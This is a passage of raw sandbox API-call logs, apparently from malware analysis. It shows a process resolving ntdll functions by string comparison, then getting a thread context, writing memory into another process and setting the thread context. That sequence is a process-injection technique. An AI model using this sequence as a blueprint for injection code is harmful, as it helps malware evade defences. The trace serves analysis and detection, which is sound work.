lstrcmpA (lpString1="LdrUnlockLoaderLock", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrUnregisterDllNotification", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksum", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksumEx", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrpResGetMappingSize", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrpResGetResourceDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="MD4Final", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="MD4Init", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="MD4Update", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="MD5Final", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="MD5Init", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="MD5Update", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="NlsAnsiCodePage", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="NlsMbCodePageTag", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="NlsMbOemCodePageTag", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="NtAcceptConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAccessCheck", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAccessCheckAndAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAccessCheckByType", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAccessCheckByTypeAndAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAccessCheckByTypeResultList", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarmByHandle", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAddAtom", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAddAtomEx", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAddBootEntry", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAddDriverEntry", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAdjustGroupsToken", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAdjustPrivilegesToken", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAdjustTokenClaimsAndDeviceGroups", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAlertResumeThread", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAlertThread", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAlertThreadByThreadId", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAllocateLocallyUniqueId", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAllocateReserveObject", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAllocateUserPhysicalPages", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAllocateUuids", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAllocateVirtualMemory", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAlpcAcceptConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAlpcCancelMessage", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAlpcConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAlpcConnectPortEx", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAlpcCreatePort", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAlpcCreatePortSection", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAlpcCreateResourceReserve", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAlpcCreateSectionView", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAlpcCreateSecurityContext", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAlpcDeletePortSection", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAlpcDeleteResourceReserve", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAlpcDeleteSectionView", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAlpcDeleteSecurityContext", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAlpcDisconnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAlpcImpersonateClientContainerOfPort", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAlpcImpersonateClientOfPort", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAlpcOpenSenderProcess", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAlpcOpenSenderThread", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAlpcQueryInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0207.242] lstrcmpA (lpString1="NtAlpcQueryInformationMessage", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] lstrcmpA (lpString1="NtAlpcRevokeSecurityContext", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] lstrcmpA (lpString1="NtAlpcSendWaitReceivePort", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] lstrcmpA (lpString1="NtAlpcSetInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] lstrcmpA (lpString1="NtApphelpCacheControl", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] lstrcmpA (lpString1="NtAreMappedFilesTheSame", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] lstrcmpA (lpString1="NtAssignProcessToJobObject", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] lstrcmpA (lpString1="NtAssociateWaitCompletionPacket", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] lstrcmpA (lpString1="NtCallbackReturn", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] lstrcmpA (lpString1="NtCancelIoFile", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] lstrcmpA (lpString1="NtCancelIoFileEx", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] lstrcmpA (lpString1="NtCancelSynchronousIoFile", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] lstrcmpA (lpString1="NtCancelTimer", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] lstrcmpA (lpString1="NtCancelTimer2", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] lstrcmpA (lpString1="NtCancelWaitCompletionPacket", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] lstrcmpA (lpString1="NtClearEvent", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] lstrcmpA (lpString1="NtClose", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] lstrcmpA (lpString1="NtCloseObjectAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] lstrcmpA (lpString1="NtCommitComplete", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] lstrcmpA (lpString1="NtCommitEnlistment", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] lstrcmpA (lpString1="NtCommitTransaction", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] lstrcmpA (lpString1="NtCompactKeys", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] lstrcmpA (lpString1="NtCompareObjects", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] lstrcmpA (lpString1="NtCompareTokens", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] lstrcmpA (lpString1="NtCompleteConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] lstrcmpA (lpString1="NtCompressKey", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] lstrcmpA (lpString1="NtConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0207.243] VirtualFree (lpAddress=0x2860000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.251] NtGetContextThread (in: ThreadHandle=0x1d8, Context=0x1eaf0f0 | out: Context=0x1eaf0f0*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x100003, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x47, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x88, [65]=0x46, [66]=0xc7, [67]=0xf9, [68]=0xfe, [69]=0xf, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0xd0, [74]=0x39, [75]=0xce, [76]=0xf7, [77]=0x7f, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x100, SegGs=0x40000000, SegFs=0xce3a3440, SegEs=0x7ff7, SegDs=0x938cfc58, Edi=0xb0, Esi=0x0, Ebx=0x0, Edx=0xce39d000, Ecx=0x7ff7, Eax=0xce39d000, Ebp=0x7ff7, Eip=0xce39d000, SegCs=0x7ff7, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x40, [45]=0x34, [46]=0x3a, [47]=0xce, [48]=0xf7, [49]=0x7f, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0207.251] NtWriteVirtualMemory (in: ProcessHandle=0x1dc, BaseAddress=0x950000, Buffer=0x2343ab8*, NumberOfBytesToWrite=0x318, NumberOfBytesWritten=0x1eaf0ec | out: Buffer=0x2343ab8*, NumberOfBytesWritten=0x1eaf0ec*=0x318) returned 0x0 [0207.252] NtSetContextThread (ThreadHandle=0x1d8, Context=0x1eaf0f0*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x100003, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x47, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x95, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0xd0, [74]=0x39, [75]=0xce, [76]=0xf7, [77]=0x7f, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x100, SegGs=0x40000000, SegFs=0xce3a3440, SegEs=0x7ff7, SegDs=0x938cfc58, Edi=0xb0, Esi=0x0, Ebx=0x0, Edx=0xce39d000, Ecx=0x7ff7, Eax=0xce39d000, Ebp=0x7ff7, Eip=0xce39d000, SegCs=0x7ff7, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x18, [45]=0x2, [46]=0x95, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, 